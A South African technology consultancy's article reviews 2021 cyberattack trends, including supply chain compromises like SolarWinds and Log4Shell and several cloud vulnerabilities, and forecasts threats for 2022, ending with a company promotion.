The last few years have been anything but routine, both in terms of cybersecurity and business in general. The COVID-19 pandemic has permanently altered the way business is conducted, and cybercriminals have adjusted their tactics to fit the new reality. While cyberattacks were particularly severe in 2020 and 2021, there is little reason to believe that things will return to “normal” in 2022. Cyber-threat actors have experimented with new tactics and techniques, found them to be effective, and have incorporated them into their arsenal.
As the effects of cyberattacks were felt far beyond their target companies in 2021, several cyberattack campaigns and cyber threat actors became household names. As cybercrime becomes more professionalized and cyber threat actors seek to extract maximum value or impact from their attacks, the modern threat landscape is made up of bigger, flashier, and higher-impact attacks
We take a closer look at the major challenges that businesses faced in 2021 and what they can expect in 2022 in the following sections.
Cyberattacks are on the rise.
Every year, cybercriminals focus their efforts on a particularly effective or lucrative attack technique, such as ransomware or cryptojacking, and certain threats grow exponentially. However, the rise of cybercrime across the board was one of the most concerning trends in 2021.
The total number of cyberattacks increased by 50% year over year in 2021. However, some areas were hit harder than others, with education, research, and healthcare suffering the most. This indicates that cyber threat actors are concentrating their efforts on areas that are rapidly becoming more reliant on technology while also being the least prepared to defend themselves against cyber threats.
Attacks are increasing at an alarming rate, which bodes ill for the year 2022. The number and severity of cyber-attacks will only increase as cyber-threat actors improve their techniques and use machine learning and automation.
Attacks on the supply chain are becoming more common.
Supply chain attacks became more prevalent in late 2020, grew in 2021, and are expected to remain a major threat in 2022. This trend began in December 2020, when the SolarWinds hack was discovered.
Threat actors gained access to SolarWinds’ development environment and installed backdoor code in the company’s Orion network monitoring software. The discovery of the Sunburst malware sparked an extensive investigation that unearthed not only the details of the SolarWinds hack, but also multiple malware variants and an attack campaign affecting over 18,000 public and private sector organizations.
SolarWinds sparked a spike in supply chain attacks that lasted well into 2021 and 2022. The Kaseya attack, which took advantage of the relationships between managed service providers (MSPs) and customers to distribute ransomware using MSPs’ remote monitoring and management software, was another high-profile supply chain exploit in 2021. A few months later, an attacker with access to the npm account of a widely used library (ua-parser.js) modified the code so that anyone who downloaded and used the malicious version of the library had malware installed on their systems.
While these and other 2021 supply chain attacks had a wide-ranging impact, the exploitation of the Log4j zero-day vulnerability is likely the most well-known. The zero-day vulnerability in Log4j, a widely used Apache logging library, allowed an attacker with control over the contents of log messages or their parameters to gain remote code execution. The “Log4Shell” flaw was widely exploited, with Check Point Research detecting 40,000 attempted attacks in the first two hours after it was made public, and over 830,000 in the first three days.
The high-profile supply chain attacks of 2021 showed that it is a viable and potentially lucrative attack vector for cyber threat actors. By 2022, cyber threat actors are likely to increase their use of supply chain attacks to broaden their attack’s reach and impact.
The Pandemic of Cybercrime Isn’t Over Yet
The COVID-19 pandemic ushered in a sea change in business practices. Instead of working primarily from the corporate office, a much larger percentage of the workforce now works remotely, and this trend is likely to continue in the near future.
As cyber threat actors adapted to and took advantage of changes in corporate IT operations, the pandemic sparked a cyber pandemic. The rise of remote work turned employees’ computers – often personal devices – into a company’s first line of defence, and the rapid adoption of cloud services to support the remote workforce and meet digital transformation goals opened up new attack vectors for cyber threat actors.
Little has changed in the two years since the pandemic began. Many businesses continue to support a mostly or entirely remote workforce, and cloud adoption is increasing. Companies are struggling to secure their systems and protect corporate and customer data as cybercriminals continue to take advantage of the vulnerabilities and security gaps created by this rapid IT transformation.
The Cloud Is a Primary Target
The rapid adoption of cloud-based infrastructure and services coincided with the pandemic-inspired shift to remote work. Cloud-based infrastructure was more accessible and easier to manage for a remote workforce, and Software as a Service (SaaS) solutions filled critical gaps, such as the need for online meetings and file sharing.
Companies have had the opportunity to close many of the biggest security issues caused by a rapid transition with little or no advance planning since the rapid shift to remote and cloud in 2020. However, some cloud security gaps remain, and cyber threat actors continue to work to outpace security personnel in exploiting cloud computing’s newfound importance in modern business.
Many of these attacks target flaws in the cloud infrastructure itself, allowing an attacker to attack multiple targets with a single flaw. The OMIGOD vulnerability was discovered in September 2021. Until Microsoft’s Open Management Infrastructure (OMI) software agents embedded within Azure VMs were patched, attackers could have targeted up to 65 percent of Azure customers.
In 2021, OMIGOD was not the only security flaw discovered in Azure. Through a compromised key, the ChaosDB vulnerability discovered in August gave attackers complete control over Azure Cosmos DB clients’ cloud resources. Azurescape honed in on Azure’s Container as a Service (CaaS) offering, allowing customers to use their Kubernetes clusters within the same public cloud service. Although Azurescape was patched before it was exploited, the consequences could have been severe.
In 2021, Azure was not the only cloud service that experienced vulnerabilities and attacks. Google’s Compute Engine (GCE), which is used in Google Cloud’s Infrastructure as a Service (IaaS) offering, had a vulnerability that could have allowed complete takeovers of hosted virtual machines. To evade access restrictions and perform cache poisoning, HTTP header smuggling can be used against AWS’ API Gateway and Cognito (authentication provider). AWS support personnel may be able to read data stored in S3 buckets rather than just the metadata due to a configuration error in AWS permissions.
Increased cloud adoption attracts more scrutiny from ethical hackers as well as cyber threat actors. More cloud security issues are likely to be discovered in 2022 and beyond, based on the example of 2021.
In 2022, Defending Against Changing Threats will be a top priority.
Cyber threat actors are adapting their techniques to fit a changing world and reflect a maturing industry, as evidenced by the year 2021. Rather than hiding in the shadows, cybercriminals are launching global supply chain attacks, disrupting key industries with ransomware attacks, and adapting their tactics to a more mobile and cloud-centric workforce.
Companies can expect sophisticated attacks targeting every part of their IT infrastructure in 2022, particularly where it is weakest. Because companies lack critical visibility and control in the cloud and on BYOD devices, cybercriminals are focusing their efforts there.
Modern cyber threat campaigns necessitate the ability to respond quickly and accurately to rapidly evolving attacks that can strike anywhere in an organization’s IT infrastructure. Comprehensive security visibility, real-time threat intelligence, and an integrated security architecture that can support automated and coordinated threat prevention and response across the entire corporate IT infrastructure are all requirements.
The Nihka Technology Group is a South African technology company based in Johannesburg, South Africa. The Group is focused on bringing the digital future to both the private and public sectors, locally and globally by delivering innovative, integrated technologies and intelligent solutions. Nihka offers end-to-end multi-dimensional consulting with an emphasis on integrating the human potential. Bringing EQ into AI.
www.nihka.co.za